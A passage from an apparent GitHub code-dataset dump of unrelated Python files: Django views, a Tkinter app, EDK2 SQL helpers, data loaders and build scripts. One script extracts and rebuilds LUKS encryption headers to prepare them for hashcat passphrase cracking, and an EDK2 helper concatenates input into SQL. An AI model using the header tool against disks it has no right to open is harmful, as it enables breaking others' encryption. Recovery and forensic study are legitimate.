NotImplementedError()\n\n # ---------------------------------- TFLITE ---------------------------------- #\n\n def make_tflite_function(\n self,\n *args,\n **kwargs,\n ):\n pass\n","repo_name":"TensorSpeech/TensorFlowASR","sub_path":"tensorflow_asr/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":877,"dataset":"github-code","pt":"53"} +{"seq_id":"70790536809","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom .models import Email\nfrom django.core.mail import send_mail\nfrom .forms import EmailForm\nfrom django.conf import settings\n\ndef send(request):\n\n if request.method == 'POST':\n form = EmailForm(request.POST)\n if form.is_valid():\n # print(form.cleaned_data['email'])\n subject = form.cleaned_data['subject']\n to = []\n to.append(form.cleaned_data['to'])\n body = form.cleaned_data['body']\n send_mail(subject=subject, from_email=settings.EMAIL_HOST_USER, message=body, recipient_list=to, fail_silently=False)\n return render(request, 'home.html', {})\n form = EmailForm()\n return render(request, 'send.html', {'form':form})","repo_name":"jatin196/dashboard","sub_path":"send_email/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18534827687","text":"#5) Escreva um algoritmo para ler um número inteiro (do teclado) e escrever (na tela) o seu antecessor\n\ndef leiaint(msg):\n ok = False\n valor = 0\n while True:\n n = str(input(msg))\n if n.isnumeric():\n valor = int(n)\n ok = True\n else:\n print('\\033[0;31mERRO! Digite um número válido.\\033[m')\n if ok:\n break\n return valor\n\nn = leiaint('Digite um número: ')\nprint(f'Você acabou de digitar o número {n}, e seu antecessor é {n-1}.')\n\n\n\n\n","repo_name":"brunocroft86/exercicios-do-joao","sub_path":"ex005.py","file_name":"ex005.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22157057877","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom io import open\r\n\r\nwindows=Tk()\r\nwindows.title(\"Covid 2020\")\r\nselected=IntVar()\r\n\r\ndef click():\r\n if selected.get()==1:\r\n pantalla=\"\"\"\r\nCoahuila de Zaragoza:\r\nCasos= 22,338\r\nRecuperados= 16,967\r\nMuertes= 1,452\r\n\"\"\"\r\n archivo=open(\"coahuila.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"coahuila.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n elif selected.get()==2:\r\n pantalla=\"\"\"\r\nPuebla:\r\nCasos= 27,527\r\nRecuperados= 17,538\r\nMuertes= 3,620\r\n\"\"\"\r\n archivo=open(\"puebla.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"puebla.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n elif selected.get()==3:\r\n pantalla=\"\"\"\r\nSonora:\r\nCasos= 21,761\r\nRecuperados= 15,271\r\nMuertes= 2,678\r\n\"\"\"\r\n archivo=open(\"sonora.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"sonora.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n elif selected.get()==4:\r\n pantalla=\"\"\"\r\nTabasco:\r\nCasos= 29,815\r\nRecuperados= 22,376\r\nMuertes= 2,620\r\n\"\"\"\r\n archivo=open(\"tabasco.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"tabasco.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n \r\n else:\r\n pantalla=\"\"\"\r\nTamaulipas:\r\nCasos= 24,913\r\nRecuperados= 19,575\r\nMuertes= 1,850\r\n\"\"\"\r\n archivo=open(\"tamaulipas.txt\",\"w\")\r\n archivo.write(pantalla)\r\n archivo=open(\"tamaulipas.txt\",\"r\")\r\n text=archivo.read()\r\n archivo.close()\r\n print(text)\r\n\r\nboton1=Radiobutton(windows,text=\"Coahuila\",value=1, variable=selected)\r\nboton2=Radiobutton(windows,text=\"Puebla\",value=2, variable=selected)\r\nboton3=Radiobutton(windows,text=\"Sonora\",value=3, variable=selected)\r\nboton4=Radiobutton(windows,text=\"Tabasco\",value=4, variable=selected)\r\nboton5=Radiobutton(windows,text=\"Tamaulipas\",value=5, variable=selected)\r\nimp=Button(windows,text=\"Imprimir\",command=click)\r\n\r\nboton1.grid(column=0,row=0)\r\nboton2.grid(column=1,row=0)\r\nboton3.grid(column=2,row=0)\r\nboton4.grid(column=3,row=0)\r\nboton5.grid(column=4,row=0)\r\nimp.grid(column=5,row=0)\r\n\r\nwindows.mainloop()\r\n","repo_name":"melissa040601/PROGRAMACION-II-MELISSA-FLORES","sub_path":"Melissa Flores Colunga.py","file_name":"Melissa Flores Colunga.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74428552807","text":"from django import template\n\nfrom pyconcz_2016.announcements.models import Announcement\n\nregister = template.Library()\n\n\n@register.inclusion_tag('announcements/latest.html')\ndef latest_announcement():\n try:\n item = Announcement.objects.all().latest()\n except Announcement.DoesNotExist:\n item = None\n\n return {'item': item}\n","repo_name":"pyvec/cz.pycon.org-2016","sub_path":"pyconcz_2016/announcements/templatetags/announcement_tags.py","file_name":"announcement_tags.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"37608638459","text":"## @file\r\n# This file is used to create/update/query/erase table for files\r\n#\r\n# Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.
\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\n##\r\n# Import Modules\r\n#\r\nfrom __future__ import print_function\r\nimport Common.LongFilePathOs as os\r\n\r\nimport Common.EdkLogger as EdkLogger\r\nfrom CommonDataClass import DataClass\r\nfrom CommonDataClass.DataClass import FileClass\r\n\r\n## Convert to SQL required string format\r\ndef ConvertToSqlString(StringList):\r\n return map(lambda s: \"'\" + s.replace(\"'\", \"''\") + \"'\", StringList)\r\n\r\n## TableFile\r\n#\r\n# This class defined a common table\r\n#\r\n# @param object: Inherited from object class\r\n#\r\n# @param Cursor: Cursor of the database\r\n# @param TableName: Name of the table\r\n#\r\nclass Table(object):\r\n _COLUMN_ = ''\r\n _ID_STEP_ = 1\r\n _ID_MAX_ = 0x80000000\r\n _DUMMY_ = 0\r\n\r\n def __init__(self, Cursor, Name='', IdBase=0, Temporary=False):\r\n self.Cur = Cursor\r\n self.Table = Name\r\n self.IdBase = int(IdBase)\r\n self.ID = int(IdBase)\r\n self.Temporary = Temporary\r\n\r\n def __str__(self):\r\n return self.Table\r\n\r\n ## Create table\r\n #\r\n # Create a table\r\n #\r\n def Create(self, NewTable=True):\r\n if NewTable:\r\n self.Drop()\r\n\r\n if self.Temporary:\r\n SqlCommand = \"\"\"create temp table IF NOT EXISTS %s (%s)\"\"\" % (self.Table, self._COLUMN_)\r\n else:\r\n SqlCommand = \"\"\"create table IF NOT EXISTS %s (%s)\"\"\" % (self.Table, self._COLUMN_)\r\n EdkLogger.debug(EdkLogger.DEBUG_8, SqlCommand)\r\n self.Cur.execute(SqlCommand)\r\n self.ID = self.GetId()\r\n\r\n ## Insert table\r\n #\r\n # Insert a record into a table\r\n #\r\n def Insert(self, *Args):\r\n self.ID = self.ID + self._ID_STEP_\r\n if self.ID >= (self.IdBase + self._ID_MAX_):\r\n self.ID = self.IdBase + self._ID_STEP_\r\n Values = \", \".join(str(Arg) for Arg in Args)\r\n SqlCommand = \"insert into %s values(%s, %s)\" % (self.Table, self.ID, Values)\r\n EdkLogger.debug(EdkLogger.DEBUG_5, SqlCommand)\r\n self.Cur.execute(SqlCommand)\r\n return self.ID\r\n\r\n ## Query table\r\n #\r\n # Query all records of the table\r\n #\r\n def Query(self):\r\n SqlCommand = \"\"\"select * from %s\"\"\" % self.Table\r\n self.Cur.execute(SqlCommand)\r\n for Rs in self.Cur:\r\n EdkLogger.verbose(str(Rs))\r\n TotalCount = self.GetId()\r\n\r\n ## Drop a table\r\n #\r\n # Drop the table\r\n #\r\n def Drop(self):\r\n SqlCommand = \"\"\"drop table IF EXISTS %s\"\"\" % self.Table\r\n try:\r\n self.Cur.execute(SqlCommand)\r\n except Exception as e:\r\n print(\"An error occurred when Drop a table:\", e.args[0])\r\n\r\n ## Get count\r\n #\r\n # Get a count of all records of the table\r\n #\r\n # @retval Count: Total count of all records\r\n #\r\n def GetCount(self):\r\n SqlCommand = \"\"\"select count(ID) from %s\"\"\" % self.Table\r\n Record = self.Cur.execute(SqlCommand).fetchall()\r\n return Record[0][0]\r\n\r\n def GetId(self):\r\n SqlCommand = \"\"\"select max(ID) from %s\"\"\" % self.Table\r\n Record = self.Cur.execute(SqlCommand).fetchall()\r\n Id = Record[0][0]\r\n if Id is None:\r\n Id = self.IdBase\r\n return Id\r\n\r\n ## Init the ID of the table\r\n #\r\n # Init the ID of the table\r\n #\r\n def InitID(self):\r\n self.ID = self.GetId()\r\n\r\n ## Exec\r\n #\r\n # Exec Sql Command, return result\r\n #\r\n # @param SqlCommand: The SqlCommand to be executed\r\n #\r\n # @retval RecordSet: The result after executed\r\n #\r\n def Exec(self, SqlCommand):\r\n EdkLogger.debug(EdkLogger.DEBUG_5, SqlCommand)\r\n self.Cur.execute(SqlCommand)\r\n RecordSet = self.Cur.fetchall()\r\n return RecordSet\r\n\r\n def SetEndFlag(self):\r\n pass\r\n\r\n def IsIntegral(self):\r\n Result = self.Exec(\"select min(ID) from %s\" % (self.Table))\r\n if Result[0][0] != -1:\r\n return False\r\n return True\r\n\r\n def GetAll(self):\r\n return self.Exec(\"select * from %s where ID > 0 order by ID\" % (self.Table))\r\n\r\n\r\n## TableDataModel\r\n#\r\n# This class defined a table used for data model\r\n#\r\n# @param object: Inherited from object class\r\n#\r\n#\r\nclass TableDataModel(Table):\r\n _COLUMN_ = \"\"\"\r\n ID INTEGER PRIMARY KEY,\r\n CrossIndex INTEGER NOT NULL,\r\n Name VARCHAR NOT NULL,\r\n Description VARCHAR\r\n \"\"\"\r\n def __init__(self, Cursor):\r\n Table.__init__(self, Cursor, 'DataModel')\r\n\r\n ## Insert table\r\n #\r\n # Insert a record into table DataModel\r\n #\r\n # @param ID: ID of a ModelType\r\n # @param CrossIndex: CrossIndex of a ModelType\r\n # @param Name: Name of a ModelType\r\n # @param Description: Description of a ModelType\r\n #\r\n def Insert(self, CrossIndex, Name, Description):\r\n (Name, Description) = ConvertToSqlString((Name, Description))\r\n return Table.Insert(self, CrossIndex, Name, Description)\r\n\r\n ## Init table\r\n #\r\n # Create all default records of table DataModel\r\n #\r\n def InitTable(self):\r\n EdkLogger.verbose(\"\\nInitialize table DataModel started ...\")\r\n Count = self.GetCount()\r\n if Count is not None and Count != 0:\r\n return\r\n for Item in DataClass.MODEL_LIST:\r\n CrossIndex = Item[1]\r\n Name = Item[0]\r\n Description = Item[0]\r\n self.Insert(CrossIndex, Name, Description)\r\n EdkLogger.verbose(\"Initialize table DataModel ... DONE!\")\r\n\r\n ## Get CrossIndex\r\n #\r\n # Get a model's cross index from its name\r\n #\r\n # @param ModelName: Name of the model\r\n # @retval CrossIndex: CrossIndex of the model\r\n #\r\n def GetCrossIndex(self, ModelName):\r\n CrossIndex = -1\r\n SqlCommand = \"\"\"select CrossIndex from DataModel where name = '\"\"\" + ModelName + \"\"\"'\"\"\"\r\n self.Cur.execute(SqlCommand)\r\n for Item in self.Cur:\r\n CrossIndex = Item[0]\r\n\r\n return CrossIndex\r\n\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Source/Python/Ecc/MetaFileWorkspace/MetaDataTable.py","file_name":"MetaDataTable.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"10613347964","text":"from rdflib.namespace import Namespace, RDF, RDFS\nfrom glob import glob\nfrom os.path import isfile\nfrom pprint import PrettyPrinter\nimport ckan.logic as logic\nimport ckan.model as model\nfrom ckanapi import RemoteCKAN\nimport xml.etree.ElementTree as ET\n\n#tree = ET.parse('area-type-table.xml')\ntree = ET.parse('cf-standard-name-table.xml')\nroot = tree.getroot()\n\ndemo = RemoteCKAN('http://127.0.0.1:5000', apikey='')\n\ntitle = \"CF conventions\"\n\nfor title in root.iter('title'):\n title = title.text\n\n# tx = demo.call_action('taxonomy_show', {\n# 'uri': 'http://cfconventions.org'})\n\n\ntx = demo.call_action('taxonomy_create', {\n 'title': 'CF Standard Names',\n 'name': 'CF Standard Names',\n 'last_modified': '2017-03-28',\n 'uri': 'http://cfconventions.org'\n })\n\nfor entry in root.findall('entry'):\n label = entry.get('id')\n description = entry[0].text\n # print(description)\n\n try:\n nd = demo.call_action('taxonomy_term_create', {\n 'label': label,\n 'uri': None,\n 'description': description,\n 'taxonomy_id': tx['id'],\n 'parent_id': None\n })\n print(label)\n except:\n pass\n","repo_name":"ccca-dc/ckanext-taxonomy","sub_path":"create_taxonomy/generate_thesauri_cf_conventions.py","file_name":"generate_thesauri_cf_conventions.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6220534816","text":"#!/usr/bin/python\n\n#Source: https://github.com/paule965/LuksHeader4Hashcat.py\n#rr-20180706\n\nimport binascii, sys, codecs, datetime, os\n\n#dump the first 4096 sectors\ndef main(args):\n\tf = open(sys.argv[1], 'rb')\n\tHeaderData = f.read(2097664) \n\tFilePath = os.path.abspath(sys.argv[1])\n\tf.close()\n\n#is it a valid LUKS?\n\tif not str(binascii.hexlify(HeaderData[0:6]).decode(\"ascii\")) == \"4c554b53babe\":\n\t\tprint(\"Wrong LUKS-Magic! Check/ Change it - exit.\")\n\t\treturn\n\n#is it version1?\n\tif not str(binascii.hexlify(HeaderData[6:8]).decode(\"ascii\")) == \"0001\":\n\t\tprint(\"Wrong LUKS-Version! The script support this time only Version1.\")\n\t\treturn\n\n#parse LUKSDATA\n\tLUKSMagic=HeaderData[0:6]\n\tLUKSVersion=HeaderData[6:8]\n\tLUKSCipherName=HeaderData[8:40]\n\tLUKSCipherMode=HeaderData[40:72]\n\tLUKSCipherSpec=HeaderData[72:104]\n\tLUKSPayloadOffset=HeaderData[104:108]\n\tLUKSKeyBytes=HeaderData[108:112]\n\tLUKSMasterkey=HeaderData[112:132]\n\tLUKSMasterkeySalt=HeaderData[132:164]\n\tLUKSMasterkeyIterations=HeaderData[164:168]\n\tLUKSUUID=HeaderData[168:208]\n\n#look for Payloadoffset...\n\tPayloadOffset = (int(binascii.hexlify(LUKSPayloadOffset).decode(\"ascii\"),16))\n\tif PayloadOffset <= 4096:\n\t\tPayloadData = HeaderData[592:2097664] #Keymaterial + 1 Sector Payload\n\t\n#parse LUKSDATAKeyslots\n\tKeySlotsOffset=0\n\tLUKSKey=[]\n\tLUKSKeyValues={}\n\tfor Keyslots in range(8):\n\t\tLUKSKeyValues[Keyslots] = (\n\t\t\t#State - 0\n\t\t\tbinascii.hexlify(HeaderData[208+KeySlotsOffset:212+KeySlotsOffset]).decode(\"ascii\"),\n\t\t\t#Iterations - 1\n\t\t\tHeaderData[212+KeySlotsOffset:216+KeySlotsOffset], \n\t\t\t#Salt - 2\n\t\t\tHeaderData[216+KeySlotsOffset:248+KeySlotsOffset], \n\t\t\t#sector for keymaterial - 3\n\t\t\tHeaderData[248+KeySlotsOffset:252+KeySlotsOffset],\n\t\t\t#AF-stripes - 4\n\t\t\tHeaderData[252+KeySlotsOffset:256+KeySlotsOffset],\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\tKeySlotsOffset=KeySlotsOffset + 48\n\n#output of parsed Informations\n\tprint(\"##############################################################################################################\\n\")\n\tprint(\"Basic-Data\")\n\tprint(\"----------\")\n\tprint(\"Date/ Time (YYYY-MM-DD HH:MM:SS): \" + str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%d\")))\n\tprint(\"FileName(arg1): \" + sys.argv[1])\n\tprint(\"ScriptName(arg0): \" + sys.argv[0])\n\tprint(\"Filepath: \" + FilePath)\n\tprint(\"############################################################\\n\")\n\tprint(\"Luks-Basic-Data\")\n\tprint(\"---------------\")\n\tprint(\"LUKS-Magic: \" + str(binascii.hexlify(LUKSMagic).decode(\"ascii\")))\n\tprint(\"LUKS-Version: \" + str(binascii.hexlify(LUKSVersion).decode(\"ascii\")))\n\tprint(\"LUKS-CipherName: \" + codecs.decode(LUKSCipherName, 'utf-8')) \n\tprint(\"LUKS-CipherMode: \" + codecs.decode(LUKSCipherMode, 'utf-8'))\n\tprint(\"LUKS-CipherSpec: \" + codecs.decode(LUKSCipherSpec, 'utf-8'))\n\tprint(\"LUKS-PayloadOffset (Hex): \" + str(binascii.hexlify(LUKSPayloadOffset).decode(\"ascii\")))\n\tprint(\"LUKS-KeyBytes: \" + str(binascii.hexlify(LUKSKeyBytes).decode(\"ascii\")))\n\tprint(\"LUKS-Masterkey: \" + str(binascii.hexlify(LUKSMasterkey).decode(\"ascii\")))\n\tprint(\"LUKS-MasterkeySalt: \" + str(binascii.hexlify(LUKSMasterkeySalt).decode(\"ascii\")))\n\tprint(\"LUKS-MasterkeyIterations: \" + str(int(binascii.hexlify(LUKSMasterkeyIterations),16)))\n\tprint(\"LUKS-UUID: \" + codecs.decode(LUKSUUID, 'utf-8'))\n\tprint(\"##############################################################################################################\\n\")\n\n\n#if PayLoadoffset> 4096 read/copy 1. payloadsector\n\tif PayloadOffset > 4096:\n\t\tprint(\"PayloadOffset is > 4096, use PayloadSector \" + str(PayloadOffset) + \".\\n\")\n\t\tprint(\"###########################################################\\n\")\n\t\tf = open(sys.argv[1], 'rb')\n\t\tPayloadOffsetData = f.read(512 * (PayloadOffset + 1))\n\t\tPayloadData = HeaderData[592:2097152] + PayloadOffsetData[102400000:102400512]\n\t\tBitList = ['00','00','10','00']\n\t\tPayLoadBinData = binascii.a2b_hex(''.join (BitList))\n\t\tHeaderDataTMP = HeaderData[:104] + PayLoadBinData + HeaderData[108:208]\n\t\tf.close()\n\n\tprint(\"Luks-Keyslot-Data\\n\")\n\tprint(\"Status\t\tSlotNumber\tIterations\tMeyMaterialSector\tAF-Stripes\")\n\tprint(\"----------------------------------------------------------------------------------\")\n#find active Keys\n\tPossibleKeyslots = []\n\tfor key in LUKSKeyValues.keys():\n\t\tif LUKSKeyValues[key][0][4:8] != \"dead\":\n#somtimes i see different values in Field0 :S\n\t\t\tif str(LUKSKeyValues[key][0]) == \"00ac71f3\": # is active keyslot\n\t\t\t\tprint(\"ACTIVE-Slot:\t\" + str(key) + \"\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][1]).decode(\"ascii\"),16)) + \"\t\t\" + str(\"%#5.4X\"% (int(binascii.hexlify(LUKSKeyValues[key][3]).decode(\"ascii\"),16))) + \"\t\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][4]).decode(\"ascii\"),16)))\n\t\t\t\tPossibleKeyslots.append(key)\n\t\t\telse:\n\t\t\t\tprint(\"ACTIVE-Slot:\t\" + str(key) + \"\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][1]).decode(\"ascii\"),16))\n\t\t\t\t\t\t\t + \" Iterations - !!! ATTENTION, ABNORMAL Field0.Value: \" + str(LUKSKeyValues[key][0]) + \" !!!\")\n\t\t\t\tPossibleKeyslots.append(key)\n\t\telse:\n#find dead Keys - sometimes (valid?) data inside...\n\t\t\tif int((binascii.hexlify(LUKSKeyValues[key][1])).decode(\"ascii\"),16) != 0:\n\t\t\t\tprint(\"DEAD-Slot:\t\" + str(key) + \"\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][1]).decode(\"ascii\"),16)) + \"\t\t\" + str(\"%#5.4X\"% (int(binascii.hexlify(LUKSKeyValues[key][3]).decode(\"ascii\"),16))) + \"\t\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][4]).decode(\"ascii\"),16)))\n\t\t\t\tprint (\"!!! ATTENTION on KeySlot \" + str(key) + \", ABNORMAL Field0.Value: \" + str(LUKSKeyValues[key][0]) + \", check KeySlots- and KeyMaterialentrys !!!\")\n\t\t\t\tPossibleKeyslots.append(key)\n#if u like empty entries...\n\t\t\telse:\n\t\t\t\tprint(\"EMPTY-Slot:\t\" + str(key) + \"\t\t-\" + \"\t\t-\" + \"\t\t\t-\")\n\tprint(\"##################################################################################\\n\")\n\n#rebuild the LuksHeader\n\tintKeySlot = \"\"\n\twhile (not intKeySlot) and (not intKeySlot in PossibleKeyslots):\n\t\tintKeySlot = raw_input(\"Which KeySlot should be used? Possible is \" + str(PossibleKeyslots) + \": \") \n\t\tif not intKeySlot in str(PossibleKeyslots):\n\t\t\tprint('Your Input is not a possible KeySlot, exiting Script')\n\t\t\treturn\n\n\tintKeySlot = int(intKeySlot)\n\n#rewrite LuksHeader\n\tprint(\"\\nYour Choice is KeySlot\" + str(intKeySlot) + \".\\n\")\n\tFilePathTMP = FilePath + \"_KeySlot\" + str(intKeySlot) + \".bin\"\n\tFileInt = 1\n\twhile os.path.isfile(FilePathTMP):\n\t\tFilePathTMP = FilePath + \"_KeySlot\" + str(intKeySlot) + \"(\" + str(FileInt) + \")\" + \".bin\"\n\t\tFileInt += 1\n\tFilePath = FilePathTMP\n\tprint(\"Write to File: \" + FilePath)\n\tf = open(FilePath, 'wb')\n\tf.write(HeaderData[:208]) \n\t\n#write KeySlots\t\n\tByteListDEADKeyFirst=['00','00','DE','AD','00','00','00','00','00','00','00','00','00',\n\t\t\t\t\t '00','00','00','00','00','00','00','00','00','00','00','00','00',\n\t\t\t\t\t '00','00','00','00','00','00','00','00','00','00','00','00','00',\n\t\t\t\t\t '00','00','00']\n\tByteListDEADKeyThird=['08','00','00','0F','A0']\n\tfor i in 0,1,2,3,4,5,6,7:\n\t\tif intKeySlot == i:\n\t\t\tByteList=['00','AC','71','F3'] \t\t\t\t\t\t\t\t\t\t\t#set activ\n\t\t\tf.write(binascii.a2b_hex(''.join (ByteList)))\n\t\t\tf.write(LUKSKeyValues[intKeySlot][1]) \t\t\t\t\t\t\t\t\t#iterations\n\t\t\tf.write(LUKSKeyValues[intKeySlot][2])\t\t\t\t\t\t\t\t\t#salt\n\t\t\tf.write(LUKSKeyValues[intKeySlot][3])\t\t\t\t\t\t\t\t\t#sector KeyMaterial\n\t\t\tf.write(LUKSKeyValues[intKeySlot][4])\t\t\t\t\t\t\t\t\t#AF\n\t\telse:\n\t\t\tf.write(binascii.a2b_hex(''.join (ByteListDEADKeyFirst)))\n\t\t\tf.write(binascii.a2b_hex(\"0\" + str(i)))\n\t\t\tf.write(binascii.a2b_hex(''.join (ByteListDEADKeyThird)))\n\tf.write(PayloadData)\n\tf.close()\n\n\treturn\n\t\nif __name__ == '__main__':\n\tmain(sys.argv)\n","repo_name":"paule965/LuksHeader4Hashcat","sub_path":"LuksHeader4Hashcat.py","file_name":"LuksHeader4Hashcat.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"24226300096","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nName: PyAnime4K pip setup file\nAuthor: TianZerL\nEditor: K4YT3X, TianZerL\n\"\"\"\n\nimport setuptools, os\nfrom pyanime4k.ac import Version\n\ncurr_path = os.path.dirname(os.path.realpath(__file__))\n\nwith open(os.path.join(curr_path, \"README.md\"), \"r\") as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"pyanime4k\",\n version=Version.pyanime4k,\n author=\"TianZer\",\n description=\"An easy way to use anime4kcpp in python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n keywords=[\"anime\", \"anime4k\", \"anime4kcpp\", \"upscale\"],\n url=\"https://github.com/TianZerL/pyanime4k\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.0\",\n include_package_data=True,\n install_requires=[\"ffmpeg-python >= 0.2.0\", \"numpy >= 1.17.3\"],\n)\n","repo_name":"TianZerL/pyanime4k","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"53"} +{"seq_id":"75052931688","text":"from RePoE.parser.util import write_json, call_with_default_args\nfrom RePoE.parser import Parser_Module\n\n\nclass characters(Parser_Module):\n @staticmethod\n def write(file_system, data_path, relational_reader, translation_file_cache, ot_file_cache):\n root = []\n for row in relational_reader[\"Characters.dat\"]:\n root.append(\n {\n \"metadata_id\": row[\"Id\"],\n \"integer_id\": row[\"IntegerId\"],\n \"name\": row[\"Name\"],\n \"base_stats\": {\n \"life\": row[\"BaseMaxLife\"],\n \"mana\": row[\"BaseMaxMana\"],\n \"strength\": row[\"BaseStrength\"],\n \"dexterity\": row[\"BaseDexterity\"],\n \"intelligence\": row[\"BaseIntelligence\"],\n \"unarmed\": {\n \"attack_time\": row[\"WeaponSpeed\"],\n \"min_physical_damage\": row[\"MinDamage\"],\n \"max_physical_damage\": row[\"MaxDamage\"],\n \"range\": row[\"MaxAttackDistance\"],\n },\n },\n }\n )\n write_json(root, data_path, \"characters\")\n\n\nif __name__ == \"__main__\":\n call_with_default_args(characters.write)\n","repo_name":"brather1ng/RePoE","sub_path":"RePoE/parser/modules/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":258,"dataset":"github-code","pt":"53"} +{"seq_id":"74950233128","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport h5py\nimport torch.utils.data as data\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nclass my_dataset(data.Dataset):\n def __init__(self,mat_data):\n gt_set = mat_data['gt'][...]\n gt_set = np.transpose(gt_set,(3,0,1,2))\n pan_set = mat_data['pan'][...]\n pan_set = np.transpose(pan_set,(2,0,1))\n pan_set = pan_set[:,np.newaxis,:,:]\n ms_set = mat_data['ms'][...]\n ms_set = np.transpose(ms_set,(3,0,1,2))\n lms_set = mat_data['lms'][...]\n lms_set = np.transpose(lms_set,(3,0,1,2))\n self.gt_set = np.array(gt_set,dtype = np.float32) / 1.\n self.pan_set = np.array(pan_set, dtype = np.float32) /1.\n self.ms_set = np.array(ms_set, dtype = np.float32) / 1.\n self.lms_set = np.array(lms_set, dtype = np.float32) /1.\n \n def __getitem__(self, index):\n gt = self.gt_set[index,:,:,:]\n pan = self.pan_set[index,:,:]\n ms = self.ms_set[index,:,:,:]\n lms = self.lms_set[index,:,:,:]\n return gt, pan, lms, ms\n \n def __len__(self):\n return self.gt_set.shape[0]\n\nif __name__ == \"__main__\":\n validation_data_name = 'data.mat' #your data path\n validation_data = h5py.File(validation_data_name,'r')\n validation_dataset = my_dataset(validation_data)\n del validation_data\n data_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=1, shuffle=False) \n for index,item in enumerate(data_loader):\n print(index) \n print(type(item[2]))\n\n","repo_name":"TingMAC/FrMLNet","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35046811579","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.gis.geos import Point\nfrom bagni.models import Bagno, Neighbourhood, Municipality, District\nfrom optparse import make_option\nimport requests\nimport json\nimport logging\nimport hashlib\n\nlogging.basicConfig()\nlogger = logging.getLogger(\"bagni.console\")\n#logger.setLevel(logging.WARNING)\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('--startfrom', '-s', type=int)\n parser.add_argument('--limit', '-l', type=int)\n\n def handle(self, *args, **options):\n logger.info(\"Restoring Neighbourhood Municipalities Districts\")\n Municipality.objects.all().delete()\n District.objects.all().delete()\n Neighbourhood.objects.all().delete()\n bagni = []\n cities = [\"cervia\", \"cesenatico\", \"ferrara\", \"ravenna\", \"rimini\", \"riccione\", \"bellaria-igea-marina\"]\n for city in cities:\n try:\n with open('scripts/scraping/output_' + city + '.json', 'r') as output_file:\n bagni += json.load(output_file)\n except IOError:\n raise CommandError(\"cannot open 'scripts/scraping/output_\" + city + \".json' Have you generated it?\")\n with open(\"restore_cities.json\", 'r') as outfile:\n cache = json.load(outfile)\n base_url = \"https://maps.googleapis.com/maps/api/geocode/json?latlng={}&sensor=true\"\n if 'limit' in options and options['limit'] < len(bagni):\n bagni = bagni[:options['limit']]\n if 'startfrom' in options and options['startfrom'] < len(bagni):\n bagni = bagni[options['startfrom']:]\n tot = len(bagni)\n for count, bagno in enumerate(bagni):\n n = m = d = None\n n_name = m_name = d_name = None\n text_point = \",\".join(bagno['coords'])\n point = Point([float(coord) for coord in reversed(bagno['coords'])])\n try:\n name = bagno['name'].replace(\"- 82 \", \"\")\n if name in [\"Alcide Spiaggia\", \"Alberto\"]:\n name = \"Bagno \" + name\n b = Bagno.objects.filter(name=name)\n if len(b) == 1:\n b = b[0]\n else:\n b = b.get(point=point)\n except:\n import ipdb; ipdb.set_trace()\n h = hashlib.sha224(bagno['name'].encode('ascii', errors='ignore') + text_point).hexdigest()\n if h in cache:\n (n_name, m_name, d_name) = cache[h]\n else:\n url = base_url.format(text_point)\n try:\n r = requests.get(url)\n result = json.loads(r.content)\n\n if not b:\n import ipdb; 